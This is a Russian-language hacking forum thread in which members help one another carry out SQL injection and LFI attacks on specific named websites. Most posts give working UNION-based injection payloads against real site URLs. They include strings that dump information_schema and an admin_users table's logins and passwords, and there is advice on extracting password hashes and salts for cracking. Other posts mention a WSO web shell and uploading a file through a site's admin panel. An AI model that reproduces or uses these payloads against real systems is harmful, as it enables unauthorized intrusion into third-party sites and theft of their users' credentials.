Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    330
    Likes Received:
    129
    Reputations:
    54
    Никак ты апдейт не сделаешь в твоем случае! В MSSQL получилось бы. Лучше выдерни хэш и соль, и кинь в соответствующею темку расшифровки хешей.
     
  2. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    133
    Likes Received:
    40
    Reputations:
    26
    всем привет.
    я пока что новичок в sql уязвимостях, так вот никак не получается вывести столбцы из таблицы users
    Code:
    http://versos.ru/allautors/verso.html?id=-27+union+select+1,2,column_name,4,5+ from+information_schema.columns+where+table_name='users'+--+
    хотя он и из любой таблицы не выводит...
    Заранее спасибо.
     
  3. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    72
    Likes Received:
    6
    Reputations:
    -1
    для того чтобы вывести столбцы, переведи users в хекс,
    тоисть так должно работать
    Code:
    http://versos.ru/allautors/verso.html?id=-27+union+select+1,2,column_name,4,5+ from+information_schema.columns+where+table_name=0x7573657273+--+
    0х7573... без пробела!!!
     
    #18043 pirat0, 11 Oct 2011
    Last edited: 11 Oct 2011
  4. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    133
    Likes Received:
    40
    Reputations:
    26
    хах точно, обычно просто users и т.д. буду знать.
    Спасибо.
     
  5. ysmat

    ysmat Member

    Joined:
    20 Apr 2006
    Messages:
    89
    Likes Received:
    5
    Reputations:
    -3
    чем отличаеться функция include от функции require
    к примеру есть ли тут уязвимость
    хотя бы LFI с учетом того что PHP версии 5.3
    PHP:
    function included ()
    {
    $config $GLOBALS['part']['included'];
    require(
    PATH '/lib/temp/' strtolower($conf['part']['included']) . '.php');
    }
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    отличаются тем что, после того как функция require возвращает логический false скрипт останавливает работу фатально, а если include возвращает false то скрипт продолжает работу

    грубо говоря, если подключаемый файл не найден или путь не верно то require завершит работу скрипта, а в случий include скрипт продолжает работу
    в твоем примере инклуда нету
     
    _________________________
  7. ysmat

    ysmat Member

    Joined:
    20 Apr 2006
    Messages:
    89
    Likes Received:
    5
    Reputations:
    -3
    а почему нету $conf на самом деле $config это просто
    моя опечатка
    другое дело я не знаю как отсечь разширение .php
    в 5.3 версии
    ведь не нуль байт ни не его замена с большим количеством на слешей не работают
     
  8. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Ребята кто шарит в скулях, подскажите плиз как сформировать правильно строку запроса
     
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    SELECT * FROM adclass WHERE active='on' ORDER BY updates DESC LIMIT 10, 10
     
  10. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Или как раскрутить? Раскрутить можно если только возможно чтение и запись файлов, а вместо -10, как я понял вы можете подставить любое слово. Злонамеренный код можно использовать как разделитель.
     
  11. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    помогите расскрутить
    Code:
    http://www.watchfashion.ru/search/
    в поле поиск в Post запросе ошибка
     
  12. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    В строке поиска:
    Code:
    ') and false union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5,6,7,8,9,10#
     
    _________________________
    1 person likes this.
  13. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    не пойму почему дальше не выводится?!?!?
    Code:
    ') and false union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_name!=0x61646d696e5f7573657273)and(0x00)in(@x:=concat(@x,0x3c62723e,id,0x2e,login,0x3a,passwd))))x),4,5,6,7,8,9,10#
     
  14. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Потому что необходимо знать базовый синтаксис SQL запросов.
     
    _________________________
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    AND это не операция сложения, это просто операция объединения выражений. Таким образом

    1 and 1=1 означает выражение "если 1 истина И 1 РАВНО 1, то и все выражение истинно." Следовательно, выражение
    1 and 1=2 означает "если 1 истина И 1 РАВНО 2, то выражение истинно", но т.к. 1 не равно 2, то все выражение ложно.


    комментарий с пробелом ставится при многострочных запросах.
     
    3 people like this.
  16. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    330
    Likes Received:
    129
    Reputations:
    54
    Не только при многострочных запросах, но и если переменная, в которую мы инжектим имеет тип string. В этом случае комментарий ставится для отсечения лишней кавычки (')
     
    2 people like this.
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    2.1 Нет, не всегда, только когда запрос многострочный (солидарен с Попугаем).
    Как варианты, можно обрезать запросы либо нулл-байтом (%00), или знаками комментариев (/* или -- или # в зависимости от версий).

    2.2 -- Ставится для обрезания дополнительной части основного запроса.
    + в этом случае играет роль пробела, то есть комментарий вида +--+ эквивалентен /**/--/**/.
    Также вместо плюса можно использовать или пробел, или комментарий /**/ или знак табуляции %09 или скобки (0)union(select(1)). Всё зависит от конкретного случая. Точнее от используемой фильтрации.
    Опять же зачастую бывает, что обрезать комментарием мало, поэтому в конце запроса вместо +--+ ставят +--+1

    Одним словом, нужно экспериментировать на практике.
     
    _________________________
    1 person likes this.
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    Самый простой, взятый из практики

    Code:
    http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7,8)--+   FALSE
    
    http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7,8)--+1  TRUE
    Обнаружение SQL-инъекции = не всегда подстановка кавычек. Проверяется подзапросами

    Code:
     id=1+and+1=1
    id=1+and+1=2 
    Разный результат говорит о наличии инъекций...
    Опять же, способов выявления SQL-инъекций множество.

    Боже мой, да что я тут распинаюсь, Уважаемый, почитайте мануалы про простейшим инъекциям, азы вам объяснять?? Тут ни у кого нет ни времени, ни желания. Помощь - другое дело.
     
    _________________________
  19. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    162
    Likes Received:
    1
    Reputations:
    -10
    есть html файл с куском таблицы из wso.
    тоесть тупо кусок вида
    Code:
    
    1 столбик / 2 столбик / 3 столбик / 4 столбик/
    данные   /  данные   / данные    / данные   /
    
    в исходнике, всё это отображается вот так
    Code:
    
    <table class="main" style="background-color: rgb(41, 41, 41);" width="100%" cellpadding="2" cellspacing="1"><tbody><tr><th>1 столбик</th><th>2 столбик</th><th>3 столбик</th><th>4 столбик</th></tr><tr></tr><tr class="l2"><td>данные</td><td>данные</td><td>данные</td><td>данные</td>
    
    
    
    
    

    мб кто обьяснит, или поможет как спарсить этот кусок до вида

    Code:
     1 столбик/ 2 столбик
     данные  /  данные
     
  20. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    252
    Likes Received:
    27
    Reputations:
    9
    а можно поподробнее?а то уже минут 40 лазию по админке не могу никак залить :confused:
     
Loading...
Thread Status:
Not open for further replies.